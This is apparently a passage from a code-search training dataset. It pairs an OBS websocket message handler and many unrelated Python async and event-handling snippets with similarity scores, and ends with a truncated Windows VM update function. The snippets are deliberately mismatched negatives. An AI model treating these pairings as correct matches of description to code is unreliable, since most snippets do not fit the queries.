sha256(response_string.encode(\"utf-8\"))\r\n response: bytes = b64encode(response_hash.digest())\r\n\r\n self.obs.requests.append({\r\n \"type\": \"Authenticate\",\r\n \"auth\": 
response.decode(\"utf-8\")})\r\n\r\n else:\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"Authenticate\":\r\n self.obs.requests.append({\"type\": \"GetSceneList\"})\r\n\r\n elif request == \"SetHeartbeat\":\r\n #To be removed in 5.0.0\r\n pass\r\n\r\n elif request == \"SetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetFilenameFormatting\":\r\n pass\r\n\r\n elif request == \"GetStats\":\r\n pass\r\n\r\n elif request == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n elif request == \"GetVideoInfo\":\r\n pass\r\n\r\n elif request == \"OpenProjector\":\r\n pass\r\n\r\n elif request == \"TriggerHotkeyByName\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"TriggerHotkeyBySequence\":\r\n #Unreleased\r\n pass\r\n\r\n #Media Control\r\n elif request == \"PlayPauseMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"RestartMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StopMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"NextMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"PreviousMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaDuration\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"SetMediaTime\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"ScrubMedia\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetMediaState\":\r\n #Unreleased\r\n pass\r\n\r\n #Sources\r\n\r\n elif request == \"GetMediaSourcesList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSourcesList\":\r\n pass\r\n\r\n elif request == \"GetSourceTypesList\":\r\n pass\r\n\r\n elif request == \"GetVolume\":\r\n pass\r\n\r\n elif request == \"SetVolume\":\r\n pass\r\n\r\n elif request == \"GetMute\":\r\n pass\r\n\r\n elif request == \"SetMute\":\r\n pass\r\n\r\n elif request == \"ToggleMute\":\r\n pass\r\n\r\n elif request == \"GetAudioActive\":\r\n pass\r\n\r\n elif request == \"SetSourceName\":\r\n pass\r\n\r\n elif request == \"SetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSyncOffset\":\r\n pass\r\n\r\n elif request == \"GetSourceSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceSettings\":\r\n pass\r\n\r\n elif request == \"GetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"SetTextGDIPlusProperties\":\r\n pass\r\n\r\n elif request == \"GetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"SetTextFreetype2Properties\":\r\n pass\r\n\r\n elif request == \"GetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"SetBrowserSourceProperties\":\r\n pass\r\n\r\n elif request == \"GetSpecialSources\":\r\n pass\r\n\r\n elif request == \"GetSourceFilters\":\r\n source = self.obs.getSource(requestData[\"sourceName\"])\r\n if source != None:\r\n for _filter in self.data[\"filters\"]:\r\n source.addFilter(_filter) #type: ignore\r\n\r\n elif request == \"GetSourceFilterInfo\":\r\n pass\r\n\r\n elif request == \"AddFilterToSource\":\r\n pass\r\n\r\n elif request == \"RemoveFilterFromSource\":\r\n pass\r\n\r\n elif request == \"ReorderSourceFilter\":\r\n pass\r\n\r\n elif request == \"MoveSourceFilter\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterSettings\":\r\n pass\r\n\r\n elif request == \"SetSourceFilterVisibility\":\r\n pass\r\n \r\n elif request == \"GetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"SetAudioMonitorType\":\r\n pass\r\n\r\n elif request == \"TakeSourceScreenshot\":\r\n pass\r\n\r\n #Outpute\r\n elif request == \"ListOutputs\":\r\n pass\r\n\r\n elif request == 
\"GetOutputInfo\":\r\n pass\r\n\r\n elif request == \"StartOutput\":\r\n pass\r\n\r\n elif request == \"StopOutput\":\r\n pass\r\n\r\n #Profiles\r\n elif request == \"SetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"GetCurrentProfile\":\r\n pass\r\n\r\n elif request == \"ListProfiles\":\r\n pass\r\n\r\n #Recording\r\n elif request == \"GetRecordingStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopRecording\":\r\n pass\r\n\r\n elif request == \"StartRecording\":\r\n pass\r\n\r\n elif request == \"StopRecording\":\r\n pass\r\n\r\n elif request == \"PauseRecording\":\r\n pass\r\n\r\n elif request == \"ResumeRecording\":\r\n pass\r\n\r\n elif request == \"SetRecordingFolder\":\r\n pass\r\n\r\n elif request == \"GetRecordingFolder\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif request == \"GetReplayBufferStatus\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"StartStopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StartReplayBuffer\":\r\n pass\r\n\r\n elif request == \"StopReplayBuffer\":\r\n pass\r\n\r\n elif request == \"SaveReplayBuffer\":\r\n pass\r\n\r\n #Scene Collections\r\n elif request == \"SetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"GetCurrentSceneCollection\":\r\n pass\r\n\r\n elif request == \"ListSceneCollections\":\r\n pass\r\n\r\n #Scene Items\r\n elif request == \"GetSceneItemList\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"GetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"SetSceneItemProperties\":\r\n pass\r\n\r\n elif request == \"ResetSceneItem\":\r\n pass\r\n\r\n elif request == \"SetSceneItemRender\":\r\n pass\r\n\r\n elif request == \"SetSceneItemPosition\":\r\n pass\r\n\r\n elif request == \"SetSceneItemTransform\":\r\n pass\r\n\r\n elif request == \"SetSceneItemCrop\":\r\n pass\r\n\r\n elif request == \"DeleteSceneItem\":\r\n pass\r\n\r\n elif request == \"AddSceneItem\":\r\n #Unreleased\r\n pass\r\n\r\n elif request == \"DuplicateSceneItem\":\r\n pass\r\n\r\n #Scenes\r\n elif request == \"SetCurrentScene\":\r\n pass\r\n\r\n elif request == \"GetCurrentScene\":\r\n self.obs.setCurrentScene(self.data[\"name\"])\r\n\r\n elif request == \"GetSceneList\":\r\n for scene in self.data[\"scenes\"]:\r\n self.obs.addScene(scene)\r\n self.obs.setCurrentScene(self.data[\"current-scene\"])\r\n\r\n elif request == \"CreateScene\":\r\n pass\r\n\r\n elif request == \"ReorderSceneItems\":\r\n pass\r\n\r\n elif request == \"SetSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"RemoveSceneTransitionOverride\":\r\n pass\r\n\r\n elif request == \"GetSceneTransitionOverride\":\r\n pass\r\n\r\n #Streaming\r\n elif request == \"GetStreamingStatus\":\r\n pass\r\n\r\n elif request == \"StartStopStreaming\":\r\n pass\r\n\r\n elif request == \"StartStreaming\":\r\n pass\r\n\r\n elif request == \"StopStreaming\":\r\n pass\r\n\r\n elif request == \"SetStreamSettings\":\r\n pass\r\n\r\n elif request == \"GetStreamSettings\":\r\n pass\r\n\r\n elif request == \"SaveStreamSettings\":\r\n pass\r\n\r\n elif request == \"SendCaptions\":\r\n pass\r\n\r\n #Studio Mode\r\n elif request == \"GetStudioModeStatus\":\r\n pass\r\n\r\n elif request == \"GetPreviewScene\":\r\n pass\r\n\r\n elif request == \"SetPreviewScene\":\r\n pass\r\n\r\n elif request == \"TransitionToProgram\":\r\n pass\r\n\r\n elif request == \"EnableStudioMode\":\r\n pass\r\n\r\n elif request == \"DisableStudioMode\":\r\n pass\r\n\r\n elif request == \"ToggleStudioMode\":\r\n pass\r\n\r\n #Transitions\r\n elif request == \"GetTransitionList\":\r\n pass\r\n\r\n 
elif request == \"GetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetCurrentTransition\":\r\n pass\r\n\r\n elif request == \"SetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionDuration\":\r\n pass\r\n\r\n elif request == \"GetTransitionPosition\":\r\n pass\r\n\r\n else:\r\n print(f\"Unhandled response of type {request} and data {self.data}.\")\r\n\r\n \r\n\r\n else:\r\n event: str = self.data[\"update-type\"]\r\n #Events as of 4.8.0\r\n\r\n #Scenes\r\n if event == \"SwitchScenes\":\r\n self.obs.setCurrentScene(self.data[\"scene-name\"])\r\n\r\n elif event == \"ScenesChanged\":\r\n #self.obs.purgeScenes()\r\n pass\r\n\r\n elif event == \"SceneCollectionChanged\":\r\n pass\r\n\r\n elif event == \"SceneCollectionListChanged\":\r\n pass\r\n\r\n #Transitions\r\n elif event == \"SwitchTransition\":\r\n pass\r\n\r\n elif event == \"TransitionListChanged\":\r\n pass\r\n\r\n elif event == \"TransitionDurationChanged\":\r\n pass\r\n\r\n elif event == \"TransitionBegin\":\r\n pass\r\n\r\n elif event == \"TransitionEnd\":\r\n pass\r\n\r\n elif event == \"TransitionVideoEnd\":\r\n pass\r\n\r\n #Profiles\r\n elif event == \"ProfileChanged\":\r\n pass\r\n\r\n elif event == \"ProfileListChanged\":\r\n pass\r\n\r\n #Streaming\r\n elif event == \"StreamStarting\":\r\n pass\r\n\r\n elif event == \"StreamStarted\":\r\n pass\r\n\r\n elif event == \"StreamStopping\":\r\n pass\r\n\r\n elif event == \"StreamStopped\":\r\n pass\r\n\r\n elif event == \"StreamStatus\":\r\n pass\r\n\r\n #Recording\r\n elif event == \"RecordingStarting\":\r\n pass\r\n\r\n elif event == \"RecordingStarted\":\r\n pass\r\n\r\n elif event == \"RecordingStopping\":\r\n pass\r\n\r\n elif event == \"RecordingStopped\":\r\n pass\r\n\r\n elif event == \"RecordingPaused\":\r\n pass\r\n\r\n elif event == \"RecordingResumed\":\r\n pass\r\n\r\n #Replay Buffer\r\n elif event == \"ReplayStarting\":\r\n pass\r\n\r\n elif event == \"ReplayStarted\":\r\n pass\r\n\r\n elif event == \"ReplayStopping\":\r\n pass\r\n\r\n elif event == \"ReplayStopped\":\r\n pass\r\n\r\n #Other\r\n elif event == \"Exiting\":\r\n pass\r\n\r\n #General\r\n elif event == \"Heartbeat\":\r\n pass\r\n\r\n elif event == \"BroadcastCustomMessage\":\r\n pass\r\n\r\n #Sources\r\n elif event == \"SourceCreated\":\r\n pass\r\n\r\n elif event == \"SourceDestroyed\":\r\n pass\r\n\r\n elif event == \"SourceVolumeChanged\":\r\n pass\r\n\r\n elif event == \"SourceMuteStateChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioDeactivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioActivated\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"SourceAudioSyncOffsetChanged\":\r\n pass\r\n\r\n elif event == \"SourceAudioMixersChanged\":\r\n pass\r\n\r\n elif event == \"SourceRenamed\":\r\n pass\r\n\r\n elif event == \"SourceFilterAdded\":\r\n pass\r\n\r\n elif event == \"SourceFilterRemoved\":\r\n pass\r\n\r\n elif event == \"SourceFilterVisibilityChanged\":\r\n source = self.obs.getSource(self.data[\"sourceName\"])\r\n if source != None:\r\n _filter = source.getFilter(self.data[\"filterName\"]) #type: ignore\r\n if _filter != None:\r\n _filter.setVisible(self.data[\"filterEnabled\"]) #type: ignore\r\n\r\n elif event == \"SourceFiltersReordered\":\r\n pass\r\n\r\n #Media\r\n elif event == \"MediaPlaying\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPaused\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaRestarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStopped\":\r\n #Unreleased\r\n pass\r\n\r\n elif event 
== \"MediaNext\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaPrevious\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaStarted\":\r\n #Unreleased\r\n pass\r\n\r\n elif event == \"MediaEnded\":\r\n #Unreleased\r\n pass\r\n\r\n #Scene Items\r\n elif event == \"SceneItemOrderChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemAdded\":\r\n pass\r\n\r\n elif event == \"SceneItemRemoved\":\r\n pass\r\n\r\n elif event == \"SceneItemVisibilityChanged\":\r\n scene = self.obs.getScene(self.data[\"scene-name\"])\r\n if scene != None:\r\n source = scene.getSource(self.data[\"item-name\"]) #type: ignore\r\n if source != None:\r\n source.setVisible(self.data[\"item-visible\"]) #type: ignore\r\n \r\n\r\n elif event == \"SceneItemLockChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemTransformChanged\":\r\n pass\r\n\r\n elif event == \"SceneItemSelected\":\r\n pass\r\n\r\n elif event == \"SceneItemDeselected\":\r\n pass\r\n\r\n #Studio Mode\r\n elif event == \"PreviewSceneChanged\":\r\n pass\r\n\r\n elif event == \"StudioModeSwitched\":\r\n pass\r\n\r\n #Unhandled Events\r\n else:\r\n print(\"Unhandled event with data: \" + str(self.data))", "def on_success(self):\n pass", "async def send(self):", "def dispatch(self, sender, event, *args, **kwargs):\n pass # pragma: no cover", "def _dispatch(self, api):\n self._authorize(api)\n self._handle(api)", "def on_iteration(self):\n self.send_pending_requests()\n super().on_iteration()", "async def _async_scan(self) -> None:\n for callback in self._request_callbacks:\n callback()\n await self._async_scan_serial()", "def run(self):\n while self.running:\n self.handle_request()", "def work(self, request):\n raise NotImplementedError", "def serve(self):\r\n self.channel.wait()\r\n handler, seq, obj = self._recv()\r\n if handler == \"result\":\r\n self.dispatch_result(seq, obj)\r\n elif handler == \"exception\":\r\n self.dispatch_exception(seq, obj)\r\n else:\r\n self.dispatch_request(handler, seq, obj)", "def events(self):", "def on_get(self, req, resp, task_id):\n task_result = AsyncResult(task_id)\n result = {'status': task_result.status, 'result': task_result.result}\n resp.status = falcon.HTTP_200\n resp.body = json.dumps(result)", "async def events(self) -> Iterable[Event]:", "def test_future_event(self):\n pass", "async def start(self):", "async def start(self):", "async def async_setup(self):\n\n async def async_update(event_time):\n \"\"\"Update device.\"\"\"\n queue = [entry for entry in self._queue[0:PARALLEL_CALLS]]\n for _ in queue:\n self._queue.append(self._queue.pop(0))\n\n for data_class in queue:\n if data_class[\"next_scan\"] > time():\n continue\n self._data_classes[data_class[\"name\"]][\"next_scan\"] = (\n time() + data_class[\"interval\"]\n )\n try:\n self.data[\n data_class[\"name\"]\n ] = await self.hass.async_add_executor_job(\n partial(data_class[\"class\"], **data_class[\"kwargs\"],),\n self._auth,\n )\n async_dispatcher_send(\n self.hass, f\"netatmo-update-{data_class['name']}\"\n )\n except (pyatmo.NoDevice, pyatmo.ApiError) as err:\n _LOGGER.debug(err)\n\n async_track_time_interval(\n self.hass, async_update, timedelta(seconds=SCAN_INTERVAL)\n )\n\n async def handle_event(event):\n \"\"\"Handle webhook events.\"\"\"\n if event.data[\"data\"][\"push_type\"] == \"webhook_activation\":\n _LOGGER.info(\"%s webhook successfully registered\", MANUFACTURER)\n self._webhook = True\n\n self.hass.bus.async_listen(\"netatmo_event\", handle_event)", "def on_open(self):\n def event_loop():\n 
logger.debug(pformat(self.query.request))\n self.send(json.dumps(self.query.request))\n while not self.event.is_set():\n #print('Waiting around on the socket: %s' % self.gettimeout())\n self.event.wait(self.gettimeout())\n \n logger.debug('Event loop terminating.')\n \n self.thread = threading.Thread(\n target=event_loop)\n self.thread.setDaemon(True)\n self.thread.start()", "def _async_process_data(self):\n raise NotImplementedError", "async def on_start(self):", "def process(self, event):\n pass", "def event_queue_proc(self,event):\r\n event()", "async def async_update(self):\n await self.wrapper.async_request_refresh()", "def handle_io_event(self, data):\n getattr(\n self,\n 'control_{}'.format(self.model)\n )(data['action'])\n self.update_serverside_status({\n 'action': data['action'], 'event_id': data['event_id']\n })", "def console_request(self, evt, proto):\n if evt.kind == sugar.transport.ServerMsgFactory.TASK_RESPONSE:\n threads.deferToThread(self.on_broadcast_tasks, evt, proto)", "def main():\n\n context = yield from Context.create_client_context()\n\n yield from asyncio.sleep(2)\n\n payload = b\"0\"\n request = Message(code=PUT, payload=payload)\n request.opt.uri_host = '192.168.3.2'\n request.opt.uri_path = (\"nodes\", \"48102\", \"humidity\")\n\n response = yield from context.request(request).response\n\n print('Result: %s\\n%r'%(response.code, response.payload))", "async def start_events_async(self) -> None:\n raise NotImplementedError(\"start_events_async must be implemented for {}\".format(self.__class__.__name__))", "def async_event_handler(self, event: dict) -> None:\n if event['e'] == 'added':\n\n if event['r'] == 'lights' and event['id'] not in self.lights:\n device_type = 'light'\n device = self.lights[event['id']] = DeconzLight(\n event['id'], event['light'], self.async_put_state)\n\n elif event['r'] == 'sensors' and event['id'] not in self.sensors:\n if supported_sensor(event['sensor']):\n device_type = 'sensor'\n device = self.sensors[event['id']] = create_sensor(\n event['id'], event['sensor'], self.async_put_state)\n else:\n _LOGGER.warning('Unsupported sensor %s', event)\n return\n\n else:\n _LOGGER.debug('Unsupported event %s', event)\n return\n\n if self.async_add_device_callback:\n self.async_add_device_callback(device_type, device)\n\n elif event['e'] == 'changed':\n\n if event['r'] == 'groups' and event['id'] in self.groups:\n self.groups[event['id']].async_update(event)\n\n elif event['r'] == 'lights' and event['id'] in self.lights:\n self.lights[event['id']].async_update(event)\n self.update_group_color([event['id']])\n\n elif event['r'] == 'sensors' and event['id'] in self.sensors:\n self.sensors[event['id']].async_update(event)\n\n else:\n _LOGGER.debug('Unsupported event %s', event)\n\n elif event['e'] == 'deleted':\n _LOGGER.debug('Removed event %s', event)\n\n else:\n _LOGGER.debug('Unsupported event %s', event)", "async def start(self) -> None:", "def __call__(self, **kwargs):\n kwargs.setdefault('timeout', self.timeout)\n kwargs.setdefault('send_line', self.send_line)\n kwargs['process_results'] = self.process_results\n return async_events(self.context, self.events, **kwargs)", "async def async_update(self) -> None:\n return", "def on(self) -> None:", "async def async_event(self, event: str, *args, **kwargs):\n for cb in self.event_handlers[event]:\n asyncio.ensure_future(cb(*args, **kwargs), loop=self.loop)", "def _request(self, *args):\n raise NotImplementedError", "def sync_start(self):", "def _request(self, *args):\n 
self._silent_request(*args)\n return self._get_response()", "async def async_update(self) -> None:\n raise NotImplementedError()", "async def async_update(self) -> None:\n raise NotImplementedError()", "async def server_event_trigger(self, event):\n event_data = event[\"event_data\"]\n await self.send_json(event_data)", "def process_event(self, event):\r\n pass", "def _send_to_endpoint(self, events):\n raise NotImplementedError('Please implement _send_to_endpoint().')", "async def on_connect(self) -> None:", "def _async_update_callback(self):\n self._async_update_device_data()\n self.async_write_ha_state()", "def client_request(self, evt):\n threads.deferToThread(self.cli_db.accept, evt)", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "async def execute(self):\n return True", "def processEvent(self):\n # Note: break out of event dispatch loop when closedown event is received\n # and closing flag is set. This is to prevent DoS attack by faked closedown\n # event type, and to ensure that prior events received are all processed.\n delay_on_error_min = 0.125 # Back off retry interval on error..\n delay_on_error_max = 20.0 # ..\n delay_on_error = delay_on_error_min # ..\n while True:\n if delay_on_error < delay_on_error_max:\n delay_on_error *= 2\n try:\n # PLEASE NOTE: In the event that the HTTPC is run as duplex, not simplex\n # then the post methods will be delayed if nothing is sent down to the client\n # from the server. This timeout is controlled by QUEUE_WAIT_TIMEOUT in EventRouterHTTPS.py\n if self._simplex == True:\n self._queueEvent.wait()\n self._queueEvent.clear()\n \n if not self._queue.empty():\n Trace(\"%s queue.get ...\"%(self.getUri()), \"EventLib.EventRelayHTTPC\")\n ###msgbody = self._queue.get()\n ###Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n ###self._event.set()\n msgbody = self.getQueuedItem()\n [typ,env] = msgbody\n if typ == \"closedown\":\n if self._closing: break\n else:\n # process request as an HTTP POST request\n data = makeEnvelopeData(env)\n headers = { \"Content-type\": \"text/plain\",\n \"Accept\": \"text/plain\",\n \"Content-length\": str(len(data)) }\n self._httpcon.request(\"POST\", \"/request_path_ignored\", data, headers)\n response = self._httpcon.getresponse()\n delay_on_error = delay_on_error_min\n elif self._simplex == False:\n # Nothing in queue:\n # issue a GET for incoming events\n _log.info(\"%s HTTP get ...\"%(self.getUri()))\n headers = { \"Accept\": \"text/plain\" }\n self._httpcon.request(\"GET\", \"/request_path_ignored\", None, headers)\n response = self._httpcon.getresponse()\n if response.status == 200:\n delay_on_error = delay_on_error_min\n msgbody = response.read()\n Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n # Parse message and act accordingly\n msgdata = parseMessageData(msgbody)\n Trace(\"%s get msgdata: %s\"%(self.getUri(),str(msgdata)), \"EventLib.EventRelayHTTPC\")\n if msgdata == None:\n #TODO: Log \"Request body malformed\"\n pass\n elif msgdata[0] == \"forward\":\n # msgdata = [\"forward\", [['R1', 'R2', 'R3'], 'ev:typ', 'ev:src', 'payload']]\n event = makeEvent(evtype=msgdata[1][1],source=msgdata[1][2],payload=msgdata[1][3])\n env = constructEnvelope(msgdata[1][0], event)\n self.forward(event, env)\n elif msgdata[0] == \"idle\":\n # Idle response gives client a chance to send if 
anything is queued\n pass\n else:\n #TODO: handle closedown message?\n Warn( \"%s Request body unrecognized option: %s\"%(self.getUri(),msgdata[0]), \"EventRelayHTTPC\")\n pass\n elif response.status == 503:\n Trace( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n # Remote end closed down\n break\n else:\n # TODO: (log error response)\n Warn( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n \n except httplib.BadStatusLine, e:\n # This can happen at closedown\n Info( \"%s processEvent bad response: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.CannotSendRequest, e:\n # This can happen at closedown\n Info( \"%s Cannot send request: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.ResponseNotReady, e:\n # This can happen at startup and sometimes other times:\n # maybe multiple requests on a single HTTP connection object?\n Info( \"%s Response not ready: (%s)\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except socket.error, e:\n Warn( \"%s Socket error: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n return", "async def async_update(self):\n\n await self.status_request()", "def _dispatch(self, body):\n pass", "def _handle_first_request(self):\n pass", "def answer_waiting_call(self) -> None:", "def _dispatch(self, method, params):\n logging.debug('Calling %s%s', method, params)\n self._rpc_received_event.set()\n return SimpleJSONRPCServer.SimpleJSONRPCServer._dispatch(\n self, method, params)", "async def event_handler(self, response):\n data = ujson.loads(response.data)\n if isinstance(data, dict):\n if data['event'] == 'subscribed':\n print('Subscribed to channel: {0}, for pair: {1}, on channel ID: {2}'.format(data['channel'], data['pair'], data['chanId']))\n self.channel_mapping[data['chanId']] = (data['channel'], data['pair'])\n elif data['event'] == 'info':\n print('Exchange: {0} Websocket version: {1}'.format(self.id, data['version']))\n elif isinstance(data, list):\n if isinstance(data[1], str):\n print('Heartbeat on channel {0}'.format(data[0]))\n else:\n # Published data, time stamp and send to appropriate queue\n timestamp = self.microseconds() / 1000\n datetime = self.iso8601(timestamp)\n if self.channel_mapping[data[0]][0] == 'book':\n pair_id = self.channel_mapping[data[0]][1]\n await self.queues['orderbooks'][pair_id].put((data, timestamp, datetime))", "def run(self, event):\n pass", "def _http_thread_func(self):\r\n while not self._terminating:\r\n # pop queued request from the queue and process it\r\n (api_endpoint, params, reqid) = self.http_requests.get(True)\r\n translated = None\r\n try:\r\n answer = self.http_signed_call(api_endpoint, params)\r\n if answer[\"result\"] == \"success\":\r\n # the following will reformat the answer in such a way\r\n # that we can pass it directly to signal_recv()\r\n # as if it had come directly from the websocket\r\n translated = {\r\n \"op\": \"result\",\r\n \"result\": answer[\"data\"],\r\n \"id\": reqid\r\n }\r\n else:\r\n if \"error\" in answer:\r\n if answer[\"token\"] == \"unknown_error\":\r\n # enqueue it again, it will eventually succeed.\r\n self.enqueue_http_request(api_endpoint, params, reqid)\r\n else:\r\n\r\n # these are errors like \"Order amount is too 
low\"\r\n # or \"Order not found\" and the like, we send them\r\n # to signal_recv() as if they had come from the\r\n # streaming API beause Gox() can handle these errors.\r\n translated = {\r\n \"op\": \"remark\",\r\n \"success\": False,\r\n \"message\": answer[\"error\"],\r\n \"token\": answer[\"token\"],\r\n \"id\": reqid\r\n }\r\n\r\n else:\r\n self.debug(\"### unexpected http result:\", answer, reqid)\r\n\r\n except Exception as exc:\r\n # should this ever happen? HTTP 5xx wont trigger this,\r\n # something else must have gone wrong, a totally malformed\r\n # reply or something else.\r\n #\r\n # After some time of testing during times of heavy\r\n # volatility it appears that this happens mostly when\r\n # there is heavy load on their servers. Resubmitting\r\n # the API call will then eventally succeed.\r\n self.debug(\"### exception in _http_thread_func:\",\r\n exc, api_endpoint, params, reqid)\r\n\r\n # enqueue it again, it will eventually succeed.\r\n self.enqueue_http_request(api_endpoint, params, reqid)\r\n\r\n if translated:\r\n self.signal_recv(self, (json.dumps(translated)))\r\n\r\n self.http_requests.task_done()", "def handleEvents(self, events):\n pass", "def handle(self) -> None:", "def handle_execution_response(self, data, *, wait):\n ...", "def handle_event(event, context):\n print(\"Executing...\")\n router = Router(ROUTE_MAP)\n return router.route_request(event, context)", "def ServiceRequest(self):\n #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n pass", "def _run_all_pending_events(self):\n # pending = asyncio.all_tasks(self.loop)\n # self.loop.run_until_complete(asyncio.gather(*pending))\n async def _fn():\n pass\n future = asyncio.ensure_future(_fn())\n self.loop.run_until_complete(future)", "def perform_callback(self, *args, **kwargs):\n pass", "def on_event_finished(self, event):", "def __call__(self):\n hub.sleep(random.randint(1, self.interval))\n while True:\n self.send_req()\n self.reply_pending = True\n hub.sleep(self.interval)\n if self.reply_pending:\n self.no_response()", "def async_request(self, callback, *args):\r\n seq = self.send_request(*args)\r\n self.async_replies[seq] = callback", "def on_get(self, req, resp):\n try:\n n_reqs = int(req.params.get('n', self.default_reqs))\n except ValueError:\n error_response(resp, 'ERROR: Incorrect number of requests')\n return\n\n urls = self.scheduler.requests(n_reqs)\n resp.data = json.dumps(urls, ensure_ascii=True)\n resp.content_type = \"application/json\"\n resp.status = falcon.HTTP_200", "def on(self) -> None:\n ...", "def after_send(self):", "async def run_requests(self):\n loop = asyncio.get_event_loop()\n tasks = []\n async with aiohttp.ClientSession(connector=self.connector) as session:\n\n for index, id in enumerate(self.ids):\n if id not in self.processed_ids:\n url = self.base_url + id\n auth_token = base64.b64encode(id.encode('ascii'))\n header = {\"Authorization\": auth_token.decode('UTF-8')}\n tasks.append(asyncio.ensure_future(self._request_one(url=url, header=header, id=id, index = index, session = session)))\n\n _ = await asyncio.gather(*tasks)", "async def __call__(self, method, url, data):\n if self.stopping:\n raise ClientError()\n await self.semaphore.acquire()\n kwargs = self.response_list.pop(0)\n return AiohttpClientMockResponse(method=method, url=url, **kwargs)", "async def async_update(self):\n await self.coordinator.async_request_refresh()", "def onRequestStart(self, api, request):\n logging.info('Request start ({})'.format(request))", "def 
_post_sync(self):", "def on_response(self, response):\n pass" ]
[ "0.7191567", "0.6846686", "0.6839081", "0.66729146", "0.66401607", "0.66307336", "0.6543804", "0.64999104", "0.6479456", "0.64707613", "0.64707613", "0.64252007", "0.6379528", "0.6327033", "0.6313674", "0.62806183", "0.6274699", "0.62721395", "0.62186", "0.621285", "0.62122226", "0.6168085", "0.61414564", "0.6110584", "0.61038285", "0.60985833", "0.6068215", "0.6067375", "0.60637105", "0.6054346", "0.6046684", "0.6045369", "0.60373455", "0.60364765", "0.6030536", "0.60212356", "0.6020641", "0.6018956", "0.6018956", "0.6017395", "0.6012652", "0.59986097", "0.59659404", "0.59653616", "0.5945764", "0.5910399", "0.5901793", "0.58859277", "0.5873071", "0.58709514", "0.5865081", "0.586231", "0.586142", "0.58475876", "0.5837965", "0.58368975", "0.5832483", "0.58322847", "0.58293295", "0.5821568", "0.5821568", "0.58117783", "0.5805629", "0.58029586", "0.57919645", "0.578519", "0.57818097", "0.577931", "0.577931", "0.577931", "0.577931", "0.577931", "0.577931", "0.5772513", "0.5771351", "0.5762677", "0.5762377", "0.5759899", "0.5759376", "0.57542336", "0.575188", "0.5750934", "0.574348", "0.5733125", "0.5725755", "0.57234293", "0.5717563", "0.5716741", "0.5707753", "0.5705537", "0.56865406", "0.56835026", "0.56801933", "0.56776136", "0.56711656", "0.56656677", "0.56603986", "0.5659439", "0.56586677", "0.5656963", "0.56567687" ]
0.0
-1
Commence the update of a vm using the data read from the API
def update(vm_data: Dict[str, Any], span: Span) -> bool: vm_id = vm_data['id'] # Generate the necessary template data child_span = opentracing.tracer.start_span('generate_template_data', child_of=span) template_data = Windows._get_template_data(vm_data, child_span) child_span.finish() # Check that the data was successfully generated if template_data is None: error = f'Failed to retrieve template data for VM #{vm_id}.' Windows.logger.error(error) vm_data['errors'].append(error) span.set_tag('failed_reason', 'template_data_failed') return False # Check that all of the necessary keys are present if not all(template_data[key] is not None for key in Windows.template_keys): missing_keys = [ f'"{key}"' for key in Windows.template_keys if template_data[key] is None ] error_msg = f'Template Data Error, the following keys were missing from the VM update data: ' \ f'{", ".join(missing_keys)}.' Windows.logger.error(error_msg) vm_data['errors'].append(error_msg) span.set_tag('failed_reason', 'template_data_keys_missing') return False # If everything is okay, commence updating the VM host_name = template_data.pop('host_name') # Render the update 